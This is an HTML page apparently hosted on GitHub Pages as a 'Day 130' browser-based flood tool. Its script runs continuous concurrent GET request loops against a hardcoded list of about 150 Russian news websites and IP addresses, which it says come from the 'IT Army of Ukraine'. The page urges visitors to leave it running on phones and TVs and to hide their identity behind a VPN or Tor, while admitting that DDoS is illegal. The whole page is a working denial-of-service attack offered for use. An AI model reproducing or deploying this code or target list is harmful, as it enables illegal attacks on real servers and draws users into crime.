-
Notifications
You must be signed in to change notification settings - Fork 2
/
day130.htm
547 lines (543 loc) · 25.7 KB
/
day130.htm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
<!doctype html><head>
<html lang="en">
<meta charset="utf-8">
<meta name="viewport" content="width=1024">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Day 130 flood</title>
<link href="https://www.helpukr.xyz/bootstrap.helpukr.css" rel="stylesheet" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.min.js" crossorigin="anonymous"></script>
<script src= "https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</head>
<style>
/* width */
::-webkit-scrollbar {
width: 10px;
overflow: auto;
height: 0em;
}
/* Track */
::-webkit-scrollbar-track {
background: #34a8eb;
}
/* Handle */
::-webkit-scrollbar-thumb {
background: #63c6ff
;
}
/* Handle on hover */
::-webkit-scrollbar-thumb:hover {
background: yellow;
}
.style10 {
font-size: 9px;
color: #FFFFFF;
}
</style>
<script>
/* This method uses ipify's api to get the clients IP Address.
This method is completely free and no limitations of use. */
$.getJSON("https://api.ipify.org?format=json",
function(data) {
// userip element is where the IP will be displayed
$("#userip").html(data.ip);
})
</script>
<style>
h6 {
color:white;
}
</style>
<style>
body {
padding: 0;
margin: 0;
font-family: Arial, sans-serif;
background-color: #FFD600;
}
.title {
margin: 3rem auto 3rem auto;
text-align: center;
color: #005BBC;
}
.intro .howto {
background-color: #005BBC;
}
.intro .howto h3 {
color: #FFD600;
text-align: center;
margin-top: 1rem;
}
.intro .howto p {
color: white;
text-align: justify;
}
.footer {
color: #005BBC;
margin-top: 2rem;
text-align: center;
}
.desc{
color:black;
padding-top: 2rem;
padding-bottom: 2rem;
margin: 0 auto;
width: 60%;
}
.desc h3 {
text-align: center;
color: #005BBC;
}
#stats h4 {
font-size: 1.1em;
text-decoration: underline;
color: #005BBC;
font-weight: 400;
}
table.status {
margin-bottom: 10px;
}
.style1 {
color: #CC0000;
font-weight: bold;
}
.style6 {color: #FF6262}
.style7 {font-size: 0.1px}
.style9 {
color: #FFD600;
font-weight: bold;
font-size: 18px;
}
.style10 {font-size: 24px}
.style11 {
font-size: 16px;
color: #FFFFFF;
}
.style13 {
margin: 3rem auto 3rem auto;
text-align: center;
color: #FFD600;
font-size: 24px;
font-weight: bold;
}
.style14 {color: #FFFFFF}
.style15 {color: #FFFF00}
.style16 {color: #FF3300}
.style17 {color: #FF6633}
.style21 {color: #B9DCFF}
.style22 {color: #ECE3AA}
table {
border-color: #fffd9c;
}
</style>
<body>
<div class="modal" id="HelpUKR-WarningBox" tabindex="-1" role="dialog" aria-labelledby="HelpUKR-WarningBoxLabel" aria-hidden="true" data-bs-backdrop="static" data-bs-keyboard="false">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content">
<div class="modal-header" style=" padding-bottom: 4px; padding-top: 3px;padding-left: 3px;">
<h5 id="HelpUKR-WarningBoxLabel" style=" margin-bottom: 0px;">
<span class="modal-title style1"><img class="qIBnUc" src="https://i.imgur.com/hwWmsDc.png" draggable="false" width="50px" alt="UKR"> Warning: </span><span class="modal-title style6">Read before you continue. <span class="style16"><i>[</span><span class="style17"><b>Day 130</span></b><span class="style16">]</i></span></span></h5></div>
<div class="modal-body" style=" padding-top: 5px; padding-bottom: 0px;">
<p style=" margin-bottom: 0px;">As you're likely already aware, the action of DoSing or participating in DDoS is illegal, and for good reason.
Click on continue if you have a VPN Enabled, use a proxy, use the Tor browser or have your own secure connection and wish to support Ukraine in taking down Russian propaganda.</p>
<hr style=" margin-top: 5px; margin-bottom: 5px;">
<p>This works by sending GET requests to each targeted website.<br>
It’s like opening each website at once on your PC and<br>
re-requesting the data over and over, although the data is not saved or cached, It should be fair to say that your Internet service Provider (ISP) won’t be any more bothered about this than they would you browsing the internet, but its best to stay safe.</p></div>
<div class="modal-footer">
<button type="button" class="btn btn-secondary" onClick="window.location.href='https://www.helpukr.xyz'">Leave</button>
<button type="button" class="btn btn-primary" data-dismiss="HelpUKR-WarningBoxLabel" onClick="togglePause(); myModal.toggle();">Continue</button></div></div></div></div>
<table width="100%" border="0" align="center" bgcolor="#005BBC">
<tr>
<td bgcolor="#004A9D"><div align="center">
<table width="200" border="1" style="border-top-width: 0px;">
<tbody><tr>
<td><table width="989" border="1" align="left" style="border-top-width: 0px;border-bottom-width: 0px;border-left-width: 0px;border-right-width: 0px;">
<tbody>
<tr>
<td width="239" bgcolor="#005BB7"><div align="right"><span class="style14"><strong> Info:</strong> Your Public IP Address is: </span></div></td>
<td width="175" bgcolor="#005BB7"><h6 id="userip" style="margin-bottom: 0px;">Loading..</h6></td>
<td width="553" bgcolor="#005BB7"><div align="right"><span class="style21">For privacy, download the Tor Browser:</span> <a href="https://www.torproject.org/download/" target="_blank" class="style22" rel="nofollow">https://www.torproject.org/download/</a> </div></td>
</tr>
</tbody>
</table></td>
</tr>
</tbody></table>
<p class="style13" style="margin-top: 0px;margin-bottom: 0px;">Propaganda http(s) flood for <span class="style15">Day 130 </span>using targets from the IT Army of Ukraine.</p>
</div></td>
</tr><tr>
<td bgcolor="#0057B7"><div align="center" class="style9 style10">
<h3><u>Information about this tool.</u></h3>
</div></td>
</tr><tr>
<td><table width="90%" border="0" align="center">
<tr>
<td align="center"><p class="style11">This tool is hosted via <a href="https://pages.github.com/" target="_blank" class="align-content-sm-between"><a href="https://pages.github.com/" target="_blank" class="style15">GitHub Page</a>, You can download it for local use and customization <a href="https://raw.githubusercontent.com/helpukr/helpukr.github.io/main/day130.htm" target="_blank" class="style15">here</a>. A new page will be added for each day, with a new set of targets from the Ukrainian IT Army's telegram servers.</p>
<p class="style11">All of the news in the Russian federation is fake and need to be shut down, we need as many people as possible to help. Just a tiny 1kbps of data could be the edge needed to take down a server hosting propaganda.<br>
<br>Just open this page and leave it running on your devices as long as possible, it will flood targets selected specifically for that day.<br>
Targets are chosen by an intelligence team who are always looking at what services are aiding Russia’s war,together we can pose a huge load on their infrastructure.</p>
<details>
<summary><span style="color: #ffff99;">Click Here for <b>FAQ</b> <i>(Questions & Answers)</i></span></summary>
<p><table width="100%" border="0">
<tbody><tr>
<td><hr style=" margin-top: 5px; margin-bottom: 5px; color: #FFFFFF"><p class="style11">FAQ:<br>
<span style="color: #ffff99;"><strong>Q)</strong></span> How can I use this in the tor browser if HTTPS overrides HTTP no matter what i try?<br>
<span style="color: #ffff99;"><strong>A)</strong></span> Download the page for local use, it won't use any http/https protocols because those are used to request files from a web server, but using it locally (directly from your computer) bypasses the need and allows you to flood both HTTP and HTTPS from your TOR Browser's IP.</p>
<p class="style11"><span style="color: #ffff99;"><strong>Q)</strong></span> How can I see what's happening in more detail?<br>
<span style="color: #ffff99;"><strong>A)</strong></span>
open the developer console by pressing F12 and select the Network Tab.<br>
If you're on a mac you can't use F12 for this, instead right click anywhere on the site and click inspect, then click the network tab</p>
<p class="style11" style="margin-bottom: 0px;"><span style="color: #ffff99;"><strong>Q)</strong></span> After so much time has passed, my browser/computer become very laggy and unresponsive or my browser crashes, how can I fix this?<br>
<span style="color: #ffff99;"><strong>A)</strong></span> This happens because everything that happens is logged by the browser, but you can stop it pretty easily.<br>
In the Network tab on the developer console (F12), press both the red button and the stop symbol.</p>
<details style="margin-bottom: 16px;">
<summary><span style="color: #ffff99;">Click Here to see Example</span></summary>
<img src="https://i.imgur.com/5Cw6kai.png" draggable="false"> </details>
<p class="style11"><span style="color: #ffff99;"><strong>Q)</strong></span> Why are some of the requests having the same number error after a while?<br>
<span style="color: #ffff99;"><strong>A)</strong></span> This is likely caused by the IP of the VPN you're using has been blocked on their side, but it could also mean the site's just totally overloaded and cannot respond to any requests.<br>Also if you’re are using https:// in the address bar that would cause the http:// addresses to do the same</p></td>
</tr>
</tbody>
</table></p>
</details>
<hr style=" margin-top: 5px; margin-bottom: 5px; color: #FFFFFF"></td>
</tr>
</table>
<table width="613" border="0" align="center">
<tr>
<td width="607"><h3 align="center" class="style14">Session Status</h3>
<p align="center" class="style14" style=" margin-bottom: 0px; padding-bottom: 2px;">Below is a log of sites that ether responded with errors or failed to respond at all.<br>
It’s normal for this number to count up slow or fast and can often change.<br>
If a lot of services are overloaded the numbers will go fast, else they’ll go slower.<br>
If all requests are the same as all errors on some sites, it most likely means that the<br>
site operator has banned the IP you’re using.</p>
</td>
</tr>
</table>
</td>
</tr>
</table>
<div class="desc text-center" style=" padding-top: 4px;">
<p align="center" class="style7" style=" margin-bottom: 0px;">Total number of requests: <span id="totalrequests">0</span></p>
<p>So far <span id="totalerrors"><em>zero</em></span> sites have responded with errors</p>
<button type="button" class="btn btn-primary" onClick="togglePause();" style=" padding-left: 32px; padding-right: 32px; padding-top: 8px; padding-bottom: 8px;">Resume</button></div>
<div id="stats" class="container">
<div class="row">
</div>
</div>
<p class="footer">This website is an easy to run solution to flooding Russian propaganda via any internet capable device with a browser.<br>
For example you can walk around town shopping and flood Russian propaganda from a phone in your pocket.<br>
It can even be used via the browser app on a Smart TV in the background whilst you watch TV.<br>
With your help you can convince a Russian to rebel agents the war by making them<br>
look elsewhere for news, remember, Nothing you do is too little!<br>
Glory to Ukraine, Glory to the hero’s.<br><br>
<center>
<div id="betabox" style="text-align: center"><span class="footer"><strong><span style="color:#3E7EFF"><em><u>Beta</u>:</em></span></strong> Estimated data requested from servers via GET: <span class="number-counter" data-count-from="0" data-count-to="1000000000000" data-count-speed="0.01">0</span>MB (MegaBytes)</span></div></center>
<style>#betabox {
padding: 1px ;
border-top: 1px solid #3498db;
border-right: 1px solid #3498db;
background-color: #FFE248;
line-height: 110%;
border-left: 1px solid #3498db;
align-content: center;
align-self: 4px ;
width: 570px ;
}</style>
<script>
// target list
var urls = [
//Well done! For the last two days, the russians have not been able to access their CRM. As always, on weekends we switch to russian mass media
'https://www.bankfax.ru/',
'https://92.255.104.152:443',
'https://plamya-truda.ru/',
'https://zeml-trub.ru/',
'https://gazeta-suzemka.ru/',
'https://unecha-gazeta.ru/',
'https://www.rosniva.ru/',
'https://znamya-truda32.ru/',
'https://gazeta-rognedino.ru/',
'https://voshod-surag.ru/',
'https://volgograd24.tv/',
'https://www.xn--32-6kc4bi9i.xn--p1ai/',
'https://www.pravda-sevsk.ru/',
'https://213.159.210.204:443',
'https://newsorel.ru/',
'https://91.215.41.25:443',
'http://www.myudm.ru/online-efir-udmurtia',
'http://78.85.14.157:80',
'https://pg11.ru/',
'https://gorodkirov.ru/',
'https://progorod43.ru/',
'https://progorodnn.ru/',
'https://212.41.26.46:443',
'https://gubdaily.ru/',
'https://91.215.42.25:443',
'https://kaluganews.ru/',
'https://91.215.41.18:443',
'https://novgorod-tv.ru/teleproekty/novgorodskoe-televidenie-glavnyj-efir/',
'https://185.71.67.110:443',
'https://www.kbpravda.ru/',
'https://85.173.96.134:443',
'http://xn--80aaajllyo6c2h.xn--p1ai/',
'http://185.246.65.253:80',
'https://bloknot-volgograd.ru/',
'https://bloknot-astrakhan.ru/',
'https://bloknot-rostov.ru/',
'https://bloknot-voronezh.ru/',
'https://91.206.127.28:443',
'https://gazetanovgorod.ru/',
'https://185.71.67.94:443',
'https://vashgorod.ru/',
'https://185.98.87.245:443',
'http://xn----7sbbdcrylc1ahd6a1as4e7b.xn--p1ai/',
'http://31.31.198.201:80',
'https://www.mvestnik.ru/',
'https://185.253.34.49:443',
'https://raybudni.ru/',
'https://45.130.41.6:443',
'http://xn----7sbemcagqeo2b3bkwe.xn--p1ai/',
'http://31.31.198.122:80',
'https://communa.ru/',
'https://91.215.42.1:443',
'http://www.pryamayarech.ru/',
'http://91.189.114.8:80',
'https://www.penza-press.ru/',
'https://185.165.123.185:443',
'http://www.desnyanka.ru/',
'http://188.127.241.86:80',
'https://riavrn.ru/',
'https://85.193.84.43:443',
'https://gtrk.tv/b24',
'https://91.206.127.61:443',
'https://ranpress.ru/',
'https://82.202.170.145:443',
'https://vesti-omsk.ru/',
'https://91.206.127.31:443',
'https://yk24.ru/live/',
'https://188.127.241.185:443',
'https://bk55.ru/',
'https://193.233.15.244:443',
'http://www.selnow45.ru/',
'http://91.220.137.200:80',
'https://tnv.ru/',
'https://185.65.149.21:443',
'http://stv-online.ru/',
'http://95.181.181.108:80',
'https://gtrkkursk.ru/',
'https://91.206.127.66:443',
'http://pochepgazeta.ru/',
'http://37.140.192.11:80',
'https://onlinevologda.ru/',
'https://80.87.203.17:443',
'https://noyabrsk24.ru/',
'https://213.59.224.191:443',
'https://kurgan.ru/',
'https://195.161.62.72:443',
'https://newsvladimir.ru/',
'https://91.215.41.19:443',
'https://newsnn.ru/',
'https://56orb.ru/',
'https://rostovgazeta.ru/',
'https://56orb.ru/',
'https://newsnn.ru/',
'https://91.215.41.19:443',
'https://newsvladimir.ru/',
'https://195.161.62.72:443',
'https://newsvladimir.ru/',
'https://91.215.41.19:443',
'https://newsnn.ru/',
'https://56orb.ru/',
'https://rostovgazeta.ru/',
'https://78.155.198.158:443',
'https://volsklife.ru/',
'https://92.255.106.28:443',
'http://www.nnng.ru/',
'http://77.222.56.37:80',
'http://kurinfo.ru/',
'http://31.31.198.198:80',
'https://rgvktv.ru/',
'https://190.115.28.42:443',
'https://bnkirov.ru/',
'https://92.255.104.233:443',
'https://www.gorodche.ru/',
'https://91.215.42.27:443',
'https://pln-pskov.ru/',
'https://193.9.22.20:443',
'https://www.belpressa.ru/',
'https://91.215.41.42:443',
'https://bst.bratsk.ru/',
'https://91.189.160.11:443',
'http://belovskiezori.ru/',
'http://81.200.112.223:80',
'https://xn--35-dlcmp7ch.xn--p1ai/',
'http://belgorodtv.ru/',
'http://91.77.163.36:80',
'https://91.77.163.36:443',
'https://ya62.ru/',
'https://178.208.71.12:443',
'https://pravdapskov.ru/',
'https://188.130.243.110:443',
'https://www.gtrkpskov.ru/',
'https://91.206.127.67:443',
'https://baikalskieogni.ru/',
'http://xn----ctbbblrdlg0afgb8aiq0n.xn--p1ai/',
'http://37.18.21.184:80',
'https://37.18.21.184:443',
'https://lg.lpgzt.ru/',
'https://176.99.4.225:443',
'https://www.moe-online.ru/',
'https://91.215.41.65:443',
'https://www.br-tvr.ru/index.php/',
'https://185.149.120.25:443',
'https://www.enisey.tv/live/',
'https://151.236.80.36:443',
'https://sitv.ru/efir/c1/',
'https://176.118.29.186:443',
'https://luki.ru/',
'https://91.213.196.10:443',
'https://gazeta.a42.ru/',
'https://212.75.210.109:443',
'https://katun24.ru/k24',
'https://193.105.235.88:443',
'https://novkos.ru/',
'https://31.31.198.45:443',
'https://xn----7sbhfgccreo6a7begpd.xn--p1ai/',
'https://91.204.73.15:443',
];
// initialize variables
var targets = urls.reduce((o, key) => ({ ...o, [key]: {number_of_requests: 0, number_of_errored_responses: 0}}), {})
var statRow = document.querySelector("#stats > .row");
var myModal = new bootstrap.Modal(document.getElementById('HelpUKR-WarningBox'), {});
var CONCURRENCY_LIMIT = 200;
var queue = [];
var attack = false;
var totalrequests = 0;
var totalerrors = 0;
function togglePause () {
if (attack) {
attack = false;
document.querySelector("div.desc .btn").innerText = "Resume";
} else {
attack = true;
document.querySelector("div.desc .btn").innerText = "Pause";
for (var i=0; i<urls.length; i++) {
flood(i);
}
}
}
async function fetchWithTimeout(resource, options) {
const controller = new AbortController();
const id = setTimeout(() => controller.abort(), options.timeout);
return fetch(resource, {
signal: controller.signal,
mode: 'no-cors'
}).then((response) => {
clearTimeout(id);
return response;
}).catch((error) => {
clearTimeout(id);
throw error;
});
}
async function sleep(ms) {
return new Promise(r => setTimeout(r, ms));
}
async function flood(n) {
const url = urls[n];
const target = targets[url];
while (attack) {
if (queue.length > CONCURRENCY_LIMIT) {
await queue.shift();
}
queue.push(
fetchWithTimeout(url, { timeout: 2000 })
.catch((error) => {
if (error.code === 20 /* ABORT */) {
return;
}
target.number_of_errored_responses++;
target.error_message = error.message;
totalerrors++;
})
.then((response) => {
if (response && !response.ok) {
target.number_of_errored_responses++;
target.error_message = response.statusText;
totalerrors++;
}
target.number_of_requests++;
})
.finally(() => updateTargetDisplay(n))
);
await sleep(1);
}
}
// Update data for target n
function updateTargetDisplay(n) {
var url = urls[n];
var {number_of_requests, number_of_errored_responses} = targets[url];
var requests_cell = document.querySelector(`#target${n} .requests`);
var errors_cell = document.querySelector(`#target${n} .errors`);
requests_cell.innerText = number_of_requests;
errors_cell.innerText = number_of_errored_responses;
document.querySelector("#totalrequests").innerText = totalrequests;
document.querySelector("#totalerrors").innerText = totalerrors;
}
// Shuffle array order before starting
for (let i = urls.length - 1; i > 0; i--) {
const j = Math.floor(Math.random() * (i + 1));
[urls[i], urls[j]] = [urls[j], urls[i]];
}
// Create div for each target
for (var i=0; i<urls.length; i++) {
statRow.innerHTML += `
<div class="col-lg-3 col-md-4 col-sm-6" id="target${i}">
<h4>${urls[i]}</h4>
<table class='status'>
<tr><td>requests:</td><td class="requests">0</td></tr>
</tr><td>errors:</td><td class="errors">0</td></tr>
</table>
</div>
`;
}
// Show warning window
myModal.toggle();
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-85513613-1');
</script>
<script>
// BETA plugin for estimated requested data
(function($) {
$.fn.countTo = function(options) {
return this.each(function() {
//-- Arrange
var FRAME_RATE = 60; // Predefine default frame rate to be 60fps
var $el = $(this);
var countFrom = parseInt($el.attr('data-count-from'));
var countTo = parseInt($el.attr('data-count-to'));
var countSpeed = $el.attr('data-count-speed'); // Number increment per second
//-- Action
var rafId;
var increment;
var currentCount = countFrom;
var countAction = function() { // Self looping local function via requestAnimationFrame
if(currentCount < countTo) { // Perform number incremeant
$el.text(Math.floor(currentCount)); // Update HTML display
increment = countSpeed / FRAME_RATE; // Calculate increment step
currentCount += increment; // Increment counter
rafId = requestAnimationFrame(countAction);
} else { // Terminate animation once it reaches the target count number
$el.text(countTo); // Set to the final value before everything stops
//cancelAnimationFrame(rafId);
}
};
rafId = requestAnimationFrame(countAction); // Initiates the looping function
});
};
}(jQuery));
//-- Executing
$('.number-counter').countTo();
</script>
</html>